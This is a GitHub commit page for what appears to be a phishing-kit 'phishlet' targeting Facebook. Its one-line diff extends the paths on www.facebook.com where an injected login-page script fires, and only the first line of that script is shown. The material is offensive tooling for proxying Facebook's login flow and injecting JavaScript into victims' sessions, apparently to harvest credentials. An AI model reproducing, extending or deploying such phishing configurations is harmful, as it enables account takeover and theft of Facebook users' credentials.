Skip to content

Commit

Permalink
Fix the Javascript on the fail page
Browse files Browse the repository at this point in the history
  • Loading branch information
charlesbel authored Jun 18, 2020
1 parent fe4e343 commit 5344e31
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion phishlets/facebook.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -35,7 +35,7 @@ login:

js_inject:
- trigger_domains: ["www.facebook.com"]
trigger_paths: ["/login.php"]
trigger_paths: ["/login.php", "/login/device-based/regular/login/", "/login/*"]
trigger_params: []
script: |
function onclickListener(){
Expand Down

0 comments on commit 5344e31

Please sign in to comment.